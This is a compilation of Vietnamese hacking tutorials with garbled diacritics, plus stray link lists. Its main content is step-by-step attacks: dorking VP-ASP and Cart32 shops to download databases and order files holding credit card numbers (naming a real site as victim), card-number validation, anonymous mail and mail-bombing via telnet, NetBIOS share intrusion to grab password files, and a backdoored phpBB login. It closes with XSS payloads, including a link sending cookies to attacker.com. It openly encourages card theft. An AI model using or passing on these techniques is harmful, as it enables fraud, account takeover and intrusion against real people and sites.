( qua li VP-ASP Shopping Cart ) li ny cc k nguy him, bi v c rt nhiu ste shopping s dng phn mm VP-ASP ! nu 1 site b li ny , hacker c th +nhn thy ng dn database/configuration +thay i ng dn ca file database/configuration + download file database/configuration +c bit : login nh administrator ca (phn mm) VP-ASP trn site , hoc login vi quyn admin vo host ca site ( nu chng b thm li SQL injection ) vi user v pw u l 'or''=' .... trong bi vit ny mnh s khng i su vo h thng shopping ny v nhng l hng cho php lm nhiu iu khc, m rt n gin ch l hng dn nhng bn no cha bit mt con ng nhanh nht c th download nhng file database cha y credit card trong nhng site mc phi li ny !! ok, chng ta bt u lm vic: u tin vo http://google.com search t kho "shopdisplaycategories" nh hnh di :

cc bn s thy v s site dng VP-ASP shopping ! tuy nhin nhiu site fix, v cng vic ca cc bn l d tm nhng site cha fix ! cc bn c th chn bt c trang no trong list site dng phn mm VP-ASP shopping :

trong bi vit ny mnh chn site http://www.theqproject.com lm victim ! khi tm thy n trn google click vo bn s thy url : http://www.theqproject.com/shopping/shopdisplaycategorie s.asp url ny cho bit tt c nhng sn phm trn website shopping :

cng vic tip theo l chuyn url http://www.theqproject.com/shopping/shopdisplaycategorie s.asp thnh url http://www.theqproject.com/shopping/shopdbtest.asp ngi l thay shopdisplaycategories.asp bng shopdbtest.asp ri click go nh hnh di :

cc bn s thy mn hnh hin th nh sau ( ch : nu i c n y ri th bn c 70% c hi download c file database )

p dng cng thc http:// [vp-asp site] / [ vp-asp dir] / [ xDatabase + .mdb ] ta thy trong v d ny + [vp-asp site] l http://www.theqproject.com +[ vp-asp dir] l shopping +[ xDatabase + .mdb ] l shoping.mdb vy ta c th dowload database ti url http://www.theqproject.com/shopping/shoping.mdb nh hnh di y :

mn hnh hi save hay open ! wow! thnh cng ri ! xin chc mng !

sau khi save vo my ( setup sn microsoft-access 2000 - nm trong b microsoft-office ) file c hnh nh sau :

double click chut vo file db trn cc bn s thy rt nhiu tab, thng thng nhng thng tin trong tab oder l nhng thng tin m chng ta cn tm kim ( cc ), click ln tab view :

sau khi click tab oder cc bn s thy rt nhiu thng tin, nhiu khi c c cc !

v by gi khi bn hiu cch hack, nhng site b li trn c rt nhiu v ang ch bn khm ph ! chc hack vui v

*thng tin thm: nu qu trnh view file mdb i password, bn c th c bi hng dn s dng chng trinh PasswarePasswordRecoveryAccess bit cch ph passwordo thn i v chc thnh c

+++++++++++++++++++ anhlanonline@yahoo.com

Hacking Credit Card

( li Cart32.exe ) trong nhng bi trc cc bn c hng dn rt c th bng hnh nh, v c thc hnh ngay chnh v vy bi vit ny l c hi cho bn tm ti v t duy khi khng c hng dn bng hnh nh ! ok, chng ta bt u bn n li ny +tm Cart32 Sites tm nhng site dng ny rt n gin , bn vo google.com hoc av.com ( y l 2 site tm kim ln nht th gii ) sau g t kho Cart32.exe v3 site google (hay av) s mang n cho bn tt c cc site cart32.exe vi phin bn 3.0 sau click vo 1 link bt k m google hay av a n cho bn +mc li ca cc phin bn cart32.exe version 2.5 version 3.0 : tt c u b li : hu ht u b li

version 3.5a : b li 1 phn nh version 4.0 : gn nh khng b li +cch khai thc li tu thuc vo mc ch ca bn , khi bn c nhng site s dng cart32.exe shoping bn c th c nhng "tr a" sau: u tin vo http://www.sitename.com/cgibin/cart32.exe/sitename sau chn mt trong cc browse sau cho tng ch : Ly Credit Cards : http://www.sitename.com/cgibin/cart32/sitename-ORDERS.txt hoc : http://www.sitename.com/cgi-bin/cart32/sitenameOUTPUT.txt Ly Admin Passwords : http://www.sitename.com/cgibin/cart32.ini Ly Clients Passwords : http://www.sitename.com/cgibin/cart32.exe/cart32clientlist Hin Th Cc Th Mc : bin/cart32.exe/error http://www.sitename.com/cgi-

li khuyn : nu bn tm thy cc trong oder.txt , ng s dng chng hay cho bt k mt ai khc ! h h h ! lm g ? cu hi hay ! th ti li hi ngc li bn th ny: bn c thch nhiu cc hay t cc? tt nhin l cu tr li s l thch nhiu ! th ti sao bn li khng ch i thm 1 vi tun website update file oder.txt ?! lc no nhiu nhiu ri hy ct li bn , h h hiu mnh khng? ! cho thn i, chc cc bn hack vui v!

+++++++++++++++++++

anhlanonline@yahoo.com

hng dn lm mt feedback
khi lm website chc chn ai cng mun lm 1 ci feedback nhng ngi gh thm website mt thi gian vo email ca h gi nhng kin ng gp n cho admin ( thay vo ch cn vo feedback send mail ) ok, vic ny rt d v y mnh lm sn cho cc bn 1 feedback bng ting vit !download n y sau khi download v view file feedback.php bng notepad v edit email admin@anhlan.us bng email ca bn :

cc bn c th chnh sa mu sc hay chuyn qua front ch ting anh tu thch, cch lm nh sau:cng view file feedback.php bng notepad sau chnh sa font v mu sc ri save li, mnh ngh vic ny rt n gin v cc bn chc chn t lm c. sau khi chnh sa theo mnh, cc bn upload 3 file feedback.php,style.css v vietuni.js ln cng 1 th mc trn 1 website support php v hm sendmail okies, run ng dn v th l xong ! chc thnh cng ! +++++++++++++++++++

anhlanonline@yahoo.com

Some Link For Free Subdomains

www.freeurl.com www.jwdx.com www.cjb.net www.dot.tk www.v3.com www.hotredirect.com www.internetjump.com www.explode.to www.zdos.com www.webalias.com www.reduce.to www.warping.to www.gosurfto.com www.2000c.net www.shorturl.com www.has.it www.doze.to www.nigx.net www.1fx.net www.soar.to www.123redirect.com www.ipfox.com www.webweaver.nu www.ohgo.com www.url-redirection.org www.aliasnames.com www.get-2.com www.myredirector.com www.dot.nu

www.tr.cx www.kickme.to www.rapworld.com/url/ www.dk3.com www.xiy.net www.url.animeumbrella.com www.suite.net/url.htm www.surftohere.com www.israd.net www.ontheweb.nu www.globalredirect.com www.flash.to www.zooming.to www.emu.vg www.linkworld.to www.rename.net www.url4life.com www.n2v.net www.is----ingbrillant.com www.nethop.com www.webmask.com www.heroffice.com www.crcpl.tsx.org www.guruguru.to www.iscool.net www.dkanet.com www.r67.com www.uni.cc www.fr.fm www.d.bz www.e33.de www.de.vu www.dd.vu www.6x.to www.b4.to

www.b6.to www.h3.to www.thx.to www.rox.to www.faster.as www.hop2.de www.tsx.to www.tsx.org www.bootme.to www.2fbi.de www.ubb.cc www.IDz.net http://zwap.to

nhng website thng dng ca th vin in t

http://www.idealibrary.com : cung cp kh nng truy cp ti 175 bo, tp ch khoa hc ca nhiu i hc ln v cc lnh vc khc nhau. Rt hu ch cho cc sinh vin v cc nh ngin cu. http://www.englishclub.com : gip hc ting anh theo cc ch nh Grammar, Business, Fun, Reading, Shop, Teacher's Room. Hng dn vit n xin vic . Lin kt vi cc site hc ting anh khc v 1 s phn mm hc ting anh. http://www.simtel.net : th vin in t cung cp hng chc ngn phn mm min ph, thuc nhiu lnh vc khc nhau, lin quan trc tip n cng ngh thng tin nh tin ch, truyn thng, ho, ...n cc lnh vc khc nh ho hc,

thin vn hc, sinh hc, a cht, m nhc...sp sp theo mi trng s dng ddos, win3x, win98... http://www.encarta.com : website min ph ca microsoft, l bch khoa th v mi vn , cc bi bo v nhng s kin trn th gii. Cng c tm kim ca site ny cho php tm kim v nhiu ch vi phm vi ton web. http://worlbook.com : c chc nng tng t nh encarta, l mt cng c hu ch cho sinh vin khi thc hin cc ngin cu, vit bo co khoa hc, biu .

Links
Chng ti xin trn trng gii thiu

Some links of vietnam

hack & crack http://vieteam.com ( site tham kho ton din v PC ) http://vncracking.tsx.org ( site crack ln ca vit nam ) http://phphuoc.htmedsoft.com ( site ca anh Phm Hng Phc vi kh nhiu bi vit v phn mm hp dn ) http://end.at/acc (site v account cha )

http://hackervn.net ( mt trong nhng site ln nht v hack

ca vit nam ) http://viethacker.net ( mt trong nhng site ln nht v hack ca vit nam ) http://www.polarhome.com/~vicki ( site ca nhm vicki ) http://blackmoont.com ( mt site tham kho v ibf, trong box invision board theo thi gian ) http://mitdac.com ( mt site cung cp kh nhiu qu him, kh tm, cp nht ) http://binhnx2000.hypermart.net ( site ca HKC ) http://hkcvn.com ( site mi ca HKC ) http://toolzone.info ( mt site ting vit v javascript ) music http://matngoc.net ( mt site tho lun v nhm Mt Ngc ) http://phihungfc.com ( mt site tho lun v Phi Hng ) http://mytam.info ( site ring ca M Tm ) http://ngothanhvan.com ( site ring ca Ng Thanh Vn ) gii thiu 1 vi website mi ca cc bn vn

Some links of The Worl

hack crack music http://www.rainforestmucsic-borneo.com ( ti y bn c th tm hiu v cc ca s v nhc s t tt c mi ni trn th gii heart

grafic http://www.photos-2000.com/flowl ( cha nhng bc nh tuyt p v cc loi hoa v bn c th ti v lm nh nn cho chic PC ca bn ) http://www.sg/courtesy/index.htm ( bn c th tm thy y danh mc ca nhng tr chi, nhng cuc thi th v, thm ch c th ti v cc wallpaper hay scrensaver p mt ) http://moonfruit.com ( cung cp cho bn hng trm kiu website khc nhau v bn c th la chn tu ---> cho php gim thiu nhng kh khn khi lm website ca bn ) other

http://www.proxy2.de ( mt site rt hay tham kho v soucre code ca guestbook v shoubox )

3 bc kim tra th tn dng

5434-8434-2900-1033

y c phi l s card ng khng? Chng ta hy kim tra n. Bc 1: kim tra loi card Type Prefix Length MASTERCARD 51-55 16 VISA 4 13, 16 AMEX 34 37 15 Diners Club/ Carte Blanche 300-305 36 38 14 Discover 6011 16 enRoute 2014 2149 15

JCB 3 16 JCB 2131 1800 15

5434-8434-2900-1033 (length = 16) y c th l th MasterCard - National Westminster Bank Bc 2: kim tra cng thc Luhn (mod 10) - ln lt ly cc ch s v tr l nu lenght chn hoc cc ch s v tr chn nu length l l nhn cho 2
5 4 3 4 8 4 3 4 2 9 0 0 1 0 3 3 x2 x2 x2 x2 x2 x2 x2 x2 --------------------------------------10 6 16 6 4 0 2 6

- tnh tng: (1+0) + 4 + (6) + 4 + (1+6) + 4 + (6) + 4 + (4) + 9 + (0) + 0 + (2) + 0 + (6) + 3 = 60 - ly tng tnh c mod cho 10, nu s d bng 0 ngha l ng, nu khc 0 ngha l sai. 60 mod 10 = 0 - Luhn Check Digit: passed. Bc 3: kim tra checksum - ln lut ly cc ch s v tr l nhn cho 2 ngoi tr ch s cui cng
5 4 3 4 8 4 3 4 2 9 0 0 1 0 3 x2 x2 x2 x2 x2 x2 x2 x2 --------------------------------------10 6 16 6 4 0 2 6

- tnh tng(*): (1+0) + 4 + (6) + 4 + (1+6) + 4 + (6) + 4 + (4) + 9 + (0) + 0 + (2) + 0 + (6) = 57 - tnh tng cc ch s ca tng(*) 5 + 7 = 12 - ly kt qu trn nhn cho 10 ri tr cho tng(*), sau mod 10, nu s d bng ch s cui cng ca card number ngha l ng, nu khc ngha l sai. (12 x 10 - 57) % 10 = 3 - Checksum: passed. 5434-8434-2900-1033 - y l s card hp l V d 2 : 4128-674-342-188 - hp l - prefix = 4, length = 13 - Valid Visa CV - Citibank - 4221661446441168 = 60, (60 mod 10) = 0 - 814837838228 = 62, 6 + 2 = 8, (8 x 10 - 62) % 10 = 8 Tuy nhin bn ch c th kim tra xem s card ng hay sai thi. s dng card, bn cn bit thm thng tin khc v card nh ngi s hu card, a ch v s phone ca anh ta, ...

Cng c h tr: (http://www.elfqrin.com/DisCard.html) Verify a Credit Card Number Credit Card #

Generate a Credit Card Number Choose Pattern

Separator:

Gi mt email nc danh hay bomb th : Trn mng Internet c rt nhiu software lm vic ny nhng tt c u da vo mt cng c c bn l telnet. TELNET u : Nu bn dng Windows th ch cn vo start/run nh vo telnet l bn c n ri y !Trong mc Terminal ca Telnet bn chn Preferences/Terminal Option chn VT100 Bt u :

Sau khi kt ni vo mng, bn vo Connect/Remote System ca Telnet, mc Host Type bn nh tn ca server m bn mun chuyn th qua : V d : mail.hn.vnn.vn , ..... mc Port bn chn l 25. Sau bn nh ni dung tng t nh sau : HELO bellcore.com MAIL FROM:hacker@hack.com RCPT TO:hacker@hack.com DATA Ni dung th y QUIT OK, by gi bn c th tin tng rng bc th bn nh l mt l th nc danh, khng ai bit bn gi c ! Chc cc bn thnh cng.

BI HC #2

NVH (c)
Xm nhp PC khc khi ang Online :

Thng thng mt hacker trc khi xm nhp my tnh, thng c gng ci mt Trojan m cng xm nhp, ni ting nht l Trojan Back orffice. Bi hc ny s ch cho bn lm th no c th kt ni vi mt my tnh ci Windows thng qua Internet v c th ly thng tin ca chng. Cng c cn thit : u tin l bn cn l mt chng trnh scan gi l Netbios scaner. Ti dng Legion hoc Winhackgold ( Download http://www.hackerclub.com ). Chng trnh s scan tt c cc my c m chia s file trn cng mt netbios. Bt u : Sau khi kt ni vo mng, bn vo Start/Run ri nh winipcfg, bn s nhn c mt a ch IP m ISP gn cho bn mi khi bn kt ni, nu bn kt ni bng Modem th s IP ny s thay i gi l IP ng. Trong mc SCAN FROM ca Legion bn hy nh a ch IP ca mnh vo. V d ti c 203.160.11.48 th ti nh trong Legion on l 203.160.11 thi. By gi mc TO ca Legion bn nh 203.160.xx (xx l a ch IP bt k bn nh vo, bn nn nh s gn nht vi IP ca mnh, ti chn s 12). By gi n nt SCAN, Legion s bt u scan v cho tt c cc a ch IP n tm thy 1 - 254. Nu bn may mn th khi chn mt a ch IP th bn s nhn thy nh sau :
Shared resources at \\206.11.11.42 Sharename Type Comment

--------------------------------------------A Disk Floppy CDRIVE Disk C:\ Drive DDRIVE Disk D:\ Drive CDROM Disk CD-Rom Read Only The command was completed successfully.

Hy click vo a ch IP vi cc lnh ca USE NET bn s c quyn kim sot a ch IP . Trong ca s DOS-Promt bn hy s dng cc lnh sau:
NET USE [drive: | *] [\\computer\directory [password | ?]] [/SAVEPW:NO] [/YES] [/NO] NET USE [port:] [\\computer\printer [password | ?]] [/SAVEPW:NO] [/YES] [/NO] NET USE drive: | \\computer\directory /DELETE [/YES] NET USE port: | \\computer\printer /DELETE [/YES] NET USE * /DELETE [/YES] NET USE drive: | * /HOME drive Specifies the drive letter you assign to a shared directory. * Specifies the next available drive letter. If used with /DELETE, specifies to disconnect all of your connections. port Specifies the parallel (LPT) port name you assign to a shared printer. computer Specifies the name of the

computer sharing the resource. directory Specifies the name of the shared directory. printer Specifies the name of the shared printer. password Specifies the password for the shared resource, if any. ? Specifies that you want to be prompted for the password of the shared resource. You don't need to use this option unless the password is optional. /SAVEPW:NO Specifies that the password you type should not be saved in your password-list file. You need to retype the password the next time you connect to this resource. /YES Carries out the NET USE command without first prompting you to provide information or confirm actions. /DELETE Breaks the specified connection to a shared resource. /NO Carries out the NET USE command, responding with NO automatically when you are prompted to confirm actions. /HOME Makes a connection to your HOME directory if one is specified in your LAN

Manager or Windows NT user account. To list all of your connections, type NET USE without options. To see this information one screen at a time, type the following at the command prompt: NET USE /? | MORE or NET HELP USE | MORE

Sau khi xm nhp bn cn ly cc thng tin ca IP ny ! Hy vo nhng ci c kiu \program files\cuttp\tree.dat, \mirc\download, windows\*.pwl ... Chuc cc bn thnh cng.

Hack Local Site, vd : Hack forum PhpBB : ###### Header Begin Project Name: How to hack a localsite Founder: Luke/Lukos Found day: 31/08/2002 Use for Education and Experiences Only ###### Header End Rt tnh c, khi hc PHP ti tm ra mt cch hack c mt s Web Portal hoc forum ca hu ht cc free hosting nh lycos.co.uk vv. V t l thnh cng l 100% tuy hi mt thi gian Trc ht cch ny gn nh kiu hack qua Local Exploit ly

Root's passwd, ci ny chc nhiu bn cng bit nhng cng khc cht t. V vy ti cng ch xin ly mt v d l hack phpBB forum lm mu chung cho cc kiu Portal hay forum khc. Bc 1. Xc nh URL website cn hack. Do y l free hosting nn website lun c dng http://root/yoursite V gi s forum phpBB nm ti URL sau http://root/victim/phpBB_path/ Ch l phi tm ng URL Root ch khng phi redirect hay forward .. Bc 2. ng k mt hosting cng trn server . V y l free hosting nn nu victim ng k c th bn cng c th ng k d dng Gi s bn ng k mt hosting nh sau http://root/mysite/ Bc 3 Xc nh DB info ca Victim iu ny rt dn gin khi bn vi victim ang cng trn mt Local Tht vy c th l /home/user_root/public_html/mysite/ hay /home/user_root/httpdocs/mysite/ tu thuc Control Panel ca Server l lai g (Cpanel, Plesk, Enxim..). Nhng iu ny khng cn ch . 3.1 Bn to mt file ly DB info ca victim nh sau ## getdb.php begin <?php $fd = fopen ("../victim/phpBB_path/config.php", "r"); while (!feof ($fd)) { $line = fgets($fd,4000); print $line; } fclose ($fd); ?> ## getdb.php end Bn c th thay $fd bng ng dn ti bt k file php m bn mun xem m ngun ca n. V i vi cc loi Portal hoc forum khc c th DB Info khng cha trong file config.php nh ca phpBB 3.2 Upload file getdb.php Bn ch vic upload ln hosting m bn va ng k http://root/mysite/getdb.php 3.3 Ly DB info ca victim Chy file getdb.php va ri trn Browser ca bn. Bn s thy mt

mn hnh trng (blank). ng lo, bn hy "View source" v bn s thy c cc thng tin nh sau : ## getdb.php's source begin <?php // // phpBB 2.x auto-generated config file // Do not change anything in this file! // $dbms = "mysql4"; $dbhost = "localhost"; $dbname = "DB name here"; $dbuser = "DB user here"; $dbpasswd = "DB passwd here"; $table_prefix = "phpbb_"; define('PHPBB_INSTALLED', true); ?> ## getdb.php's source end Xong bc th 3 Bc 4. Kim tra mt khu m bn va ly c. Vi nick Admin trong forum v tt c nhng g c th lin quan nh passwd e-mail, hosting, domain .. V c th nn nhn dng 1 passwd cho tt c nhng mt khu ca mnh cho qun. y l mt trong nhng thi quen cht ngi Nu m thnh cng th dng ti y nu khng hy sang bc th 5 Bc 5. To mt mirror phpBB forum. 5.1 Ngha l sao, bn hy upload mt phpBB forum cng phin bn vi victim vo hosting ca bn http://root/mysite/ V ng Install forum ny nu bn mun hack n. 5.2 Config forum va upload Bn hy config cho forum ca bn thc s l mt mirror ca victim's forum. iu c ngha l bn phi link DB n DB ca victim, iu tht d dng khi bn c c DB info ca victim trong tay. 5.2.1 To file config.php l ton b nhng g bn va "view source" c :

## config.php source begin <?php // // phpBB 2.x auto-generated config file // Do not change anything in this file! // $dbms = "mysql4"; $dbhost = "localhost"; $dbname = "DB name here"; $dbuser = "DB user here"; $dbpasswd = "DB passwd here"; $table_prefix = "phpbb_"; define('PHPBB_INSTALLED', true); ?> ## config.php source end 5.2.2 Upload config.php Bn upload ln file config.php trong ci forum mi toanh m bn va upload. http://root/mysite/config.php 5.2.3 Th li Bn th g http://root/mysite/ xem, nu m forum ca bn c cc thng s y ht nh ca http://root/victim/phpBB_path tc l bn thnh cng bc ny Bc 6. Sa m ngun Mirror Site Mc ch bc ny l bn s sa m ngun forum ca bn bn c th Login vo c Admin panel ca n. Nu bn hc PHP th vic ny kh d dng. Ti xin nu ra 1 phng php, l cch crack c in. 6.1 Crack c in 6.1.1 l khi bn mun crack passwd 1 file exe, bn c th deassebler n ra thnh file.asm bng nhiu chng trnh hin nay 6.1.2 Tm cc lnh nhy c iu kin (JP g g . Ci ny c hng ng m). ca on code di mt khu 6.1.3 Sa thnh lnh nhy khng iu kin 6.1.4

Compile li thnh file exe v OK. Ta nhp bt c mt khu no vo n cng chp nhn 6.2 Sa m ngun Sa file login.php v s cho php bn Login di mi nickname bng 1 passwd chn sn 6.2.1 Chn mt khu chung cho ton b cc nick. Thc s cc mt khu trong phpBB c m ho theo kiu MD5, do c th rt kh khn c th gii m n. Nu cc bn hiu r v kiu encode ny th cc bn c th t tm cho mnh mt khu thch hp, nu khng cc bn c th s dng mt khu c ti gii m l: "hainam@hainam.org" Ci a ch mail ca ti y m, khi mt khu ny c m ho theo MD5 n s l mt mt khu nh sau "692e2c95b693cf6fbec8ea5c40536b9e" hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e 6.2.2 Thit lp mt khu chung cho ton b cc nick Trc ht bn m file login.php ra tm on sau : ## file login.php .. define("IN_LOGIN", true); define('IN_PHPBB', true); $phpbb_root_path = './'; include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); ## file login.php .. Chn thm bin $hack = "692e2c95b693cf6fbec8ea5c40536b9e"; Tc l sa oanj m thnh ## file login.php .. define("IN_LOGIN", true); define('IN_PHPBB', true); $phpbb_root_path = './'; include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); $hack = "692e2c95b693cf6fbec8ea5c40536b9e"; ## file login.php .. Tip tm on m sau ## file login.php .. else { if( md5($password) == $row['user_password'] && $row['user_active']

) { $autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0; ## file login.php .. Sa on m thnh ## file login.php .. else { if( md5($password) == $hack && $row['user_active'] ) { $autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0; ## file login.php .. Ghi li file login.php Bc 7.Login User vi mt khu chn By gi bn c th login vo din n qua website ca bn http://root/mysite/login.php vi bt c nickname no bng mt khu m bn chn. y l "hainam@hainam.org" k c l nick Admin, v vo c Admin Panel .. Ch rng website ca bn th User ch c th login vi mt khu l hainam@hainam.org ch khng th bng bt k mt khu khc k c l mt khu ng Tng qut : I/Phng Php -y l mt v d cho vic hack cc website khi trong mt local, khng ch ring i vi phpBB m c th p dng c cho nhiu Portal hay forum khc, tuy nhin c th hack c tng loi bn u phi hiu rt k v n v trnh lm dng qu ng. -Cch hack ny tuy mt nhiu thi gian trong vic upload mt mirror nhng rt hiu qu. Tuy nhin tuyt i khng nn s dng chng lung tung v ba bi. -Cc hosting cho php free, iu chng t h rt tt bng, cng chnh v vy cng khng nn s dng phng php ny khi KHNG THC S cn thit II/V d. -Trc ht ti xin li nhng ai lm website **** v ti s a

website ca cc bn ra lm v d v l victim u tin ca ti. -Mong cc bn, nhng ngi ang mun hc hi thm mt cht kinh nghim ch tham qua ch khng lm dng gi lm hng DataBase ca h, thc s ti backup nhng ti cng rt ngi restore li. Hn na m bo cho cc bi vit tip theo khng b phn i, ti mong mi ngi hy tn trng kin ca ti, KHNG PH PHCH G DB CA VICTIM v mang mc ch hc hi v tham kho ln hang u. -Website mirror ca website**** l **** , ti y cc bn c th login vo bt c nickname no trong din n **** vi mt khu chung l "hainam@hainam.org" . hy nh l KHNG NN PH DB CA H, chi nn tham kho III/Kinh nghim iu quan trng khng phi l chng ta hack c nhng ci g m l chng ta hc c nhng ci g. Qua bi vit ny mong cc bn nm r c mt s thao tc sau -c m ngun ca mt file bt k trn website khi cng mt server (Bc 3) -Kinh nghim v mt khu, d tm v ghi nh (Bc 4) -Cch to mt mirror website hay l cch link DB cho nhiu website (Bc 5) -Cch crack c in bng ASM (Bc 6.1) Cc bn nn tm ra cc mi lin h gia cc Portal, Forum, Guest Book, Chatroom PHP-CGI,.. c th p dng phng php ny. Mt khc cc bn cng c th hack c ngay c i vi cc domain hosting ch khng phi l cc site c dng http://root/yoursite/ . V Cc Paid hosting cng khng ngai tr kh nng b hack nu cc hacker thc s mun hack v sn sang b tin mua mt hosting trn cng mt Server. Phn hack paid hosting v domain ti xin cho cc bn t tm hiu. Hy nh rng lun lun phi ch n URL Root ca mi hosting. V d nh Cpanel th URL Root cho cc domain hosting l? http://[ip/ Server]/~user .vv Chc cc bn thnh cng Bi vit ca Lukos

Cross Site Scripting : Ngy nay! cc l hng Cross Site Scripting (XSS) ngy cng c pht hin nhiu cc dch v i chng ni ting nh: Yahoo, Hotmail, Ebay... Cng ng cc Hacker v Security chng minh v c nhiu cuc trnh din v v s nguy him ca XSS bn trong cc dch v i chng ni ting nh: Yahoo, Hotmail, Ebay v mt s sn phm c a chung nh: Apache, Tomcat, IIS, Lotus Domino. Cc l hng XSS ny cho php cc Hacker c th d dng nh cp User ca ngi dng trn cc ng dng Web. Nhng thc hin c mt cuc tn cng XSS th i hi cc Hacker phi c mt kh nng nht nh. u tin cc Hacker s c gng nh cp Cookies ca ngi s dng vo ng thi im m ngi s dng ng nhp n cc dch v ng dng Web. Gn nh tt c cc dch v Web i chng u s dng Cookies lin kt cc ti khon vi ngi s dng. in hnh l cc dch v Webmail nh: Yahoo, Hotmail, Netscape...V c cc dch v ngn hng, thng mi in t cng s dng Cookies cho mc ch chng thc v cp php. Trong mt kch bn ng nhp vo ca cc ng dng Web. C 2 Token chng thc c yu cu trao i. N chnh l Username v Password...2 gi tr ny c lu gi bn trong Cookies, sau c s dng nh mt du hiu chng thc duy nht. Vy nh cp c User v Password cuat nn nhn. Th trc ht bn phi nh cp c Cookies ca h. Cc Hacker thng s dng v khai thc tnh d tn thng XSS n cp Cookies ca ngi dng trn Internet. Cc Hacker cng c th gin tip s dng cc k thut khc thc hin cng vic ny: chng hn nh t Cahe DNS, cc Bug t trnh duyt Internet ca bn, hay s dng mt Trojan. Mt khi cc Cookies c b nh cp. Cc Hacker c th khai thc cc thng tin qu gi lu trn Cookies v bt u hng cc hot ng n cc Server

Web Application. Bt u tn cng n ti khon ca nn nhn. Nu thhh cng cc Hacker c th ton quyn s dng v iu khin cc ti khon ng dng trn Web ca bn. Chng ta bt u tm hiu v cc cuc tn cng XSS: Bn thn XSS l vit tt ca (Cross Site Scripting). Nu mt dch v Web c cha tnh tn thng XSS n cho php cc Hacker c th gi cc d liu him c ti nn nhn hoc xuyn qua cc ng dng . Cc Hacker thng thc hin khai thc tnh d tn thng XSS bng k xo s dng cc URL him c hay li dng s s h ca nn nhn nh la h. Nhng URL ny rt a dng v ngn ng: (VBScript, Javascript...etc) v chng s c Excute ngay trn trnh duyt ca nn nhn. Tnh tn thng XSS c xy ra bi mt s bt thng trong cc ng dng Web khi x l cc gi tr u vo ca ngi dng. Di y l mt v d v tnh d tn thng ca XSS c khai thc bng cch nhng JavaScript, n s c thc thi trn trnh duyt ca nn nhn cng vi s cho php ca dch v Web d tn thng: http://www.microsoft.com/education/?ID=MCTN&target=http://www.m icrosoft.com/education/?ID=MCTN&target="><script>alert(document. cookie)</script> http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw= <script>alert(Test);</script> http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cooki e)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1 http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?se arch_text=%22%3E%3Cscript%3Ealert%28document.cookie%29%3 C%2Fscript%3E Cc dch v Web phn ln s dng ngn ng CGI. Tht ra th nn nhn khng cn thit phi Click vo mt Link. Code XSS cng c th c ti t ng trong mt E-mail di nh dng HTML khi nn nhn c Mail (thng l 2 Tag: IMG hay FRAME HTML - Badtrans Worm l mt v d in hnh). C rt nhiu cch trn m JavaScript vo mt URL cho mc ch khai thc tnh d tn thng

ca XSS. Cross Site l mt b phn ca XSS s tham chiu ti nhng s hn ch an ton m b trnh duyt mng thng thng c lin quan n d liu vi cc Website ng (s dng DHTML). Bi vic thc hin cc Script trn trnh duyt ca nn nhn cng vi s cho php ca ng dng Web . Cc Hacker c th vt qua Document Object Model (DOM). Li dng s s h ny cc Hacker s nh cp Cookies v t nhp vo cc ti khon ca bn. DOM l mt Framework cho php thc hin nhng kch bn lm thay i ni dng ca nhng trang Web ng.

Nh ni! cc Hacker c th li dng tnh d tn thng ca XSS nh cp Cookies ca ngi s dng. Bi vic trn cc Script him c, cc Hacker c th nm quyn iu khin b trnh duyt cuar nn nhn. H s li dng tnh d tn thng trong trnh duyt ca nn nhn dnh quyn truy cp ti h iu hnh ca h. Mt on Code v d: <a href="javascript#[code]"> <div onmouseover="[code]"> <img src="java script:[code]"> <img dynsrc="java script:[code]"> <input type="image" dynsrc="java script:[code]"> <bgsound src="java script:[code]"> &<script>[code]</script> &{[code]}; <img src=&{[code]};> <link rel="stylesheet" href="java script:[code]"> <iframe src="vbscript :[code]"> <img src="mocha:[code]"> <img src="livescript:[code]"> <a href="about :<script>[code]</script>"> <meta http-equiv="refresh" content="0;url=java script:[code]"> <body onload="[code]"> <div style="background-image: url(java script:[code]);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression([code]);"> <style type="text/javascript">[code]</style>

<object classid="clsid:..." codebase="java script:[code]"> <style><!--</style><script>[code]//--></script> <![CDATA[<!--]]><script>[code]//--></script> <!-- -- --><script>[code]</script><!-- -- --> <<script>[code]</script> <img src="blah"onmouseover="[code]"> <img src="blah>" onmouseover="[code]"> <xml src="java script:[code]"> <xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>[code][\xC0][\xBC]/script> Bn c th tham kho thm thng tin : http://www.cgisecurity.com/articles/xss-faq.shtml http://www.w3.org/DOM/ A Tradition XSS Power Hjack thc hin mt phin nh cp (Hjack) cc Hacker thng s dng b chp gi tin (Sniffer), cc cng c b kho (Brute Force)...Thng dng v ph hp hn c vn l cch nh cp Cookies nm quyn iu khin mt phin ng dng mng ca mt ngi dng hp php trong khi ngi dng ng nhp vo h thng mng ng dng. Thng thng th k tn cng thng thc hin tt c cc chc nng ng dng ca mng vi cng c quyn ca ngi s dng hp php . Di y l cc bc c Hacker s dng nh cp Cookies ca ngi s dng hp php - Mt ngi s dng ng nhp vo h thng ng dng Web ca h, mt phin lm vic c thit lp. Cc Hacker bit v tnh d tn thng ca h thng ng dng Web . - Hacker s gi cc m XSS him c n nn nhn thng qua Email di nh dng HTML hay qua mt trang Web trung gian. Trong mt vi trng hp cc Hacker c th nhng chng vo cc ni dung Web ph bin nh Guest Book, Form Mail...cc m him c ny s c t ng thc thi trn trnh duyt ca nn nhn m khng cn s cho php ca h. Ly v d: tnh d tn thng trong http://hotwried.lycos.com C on Code sau:

<html> <head> <title>Look at this!</title> </head> <body> <a href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.ht ml?tw=< script>document.location.replace('http://attacker.com/steal.cgi?'+docu m ent.cookie);</script>"> Check this CNN story out! </a> </body> </html>

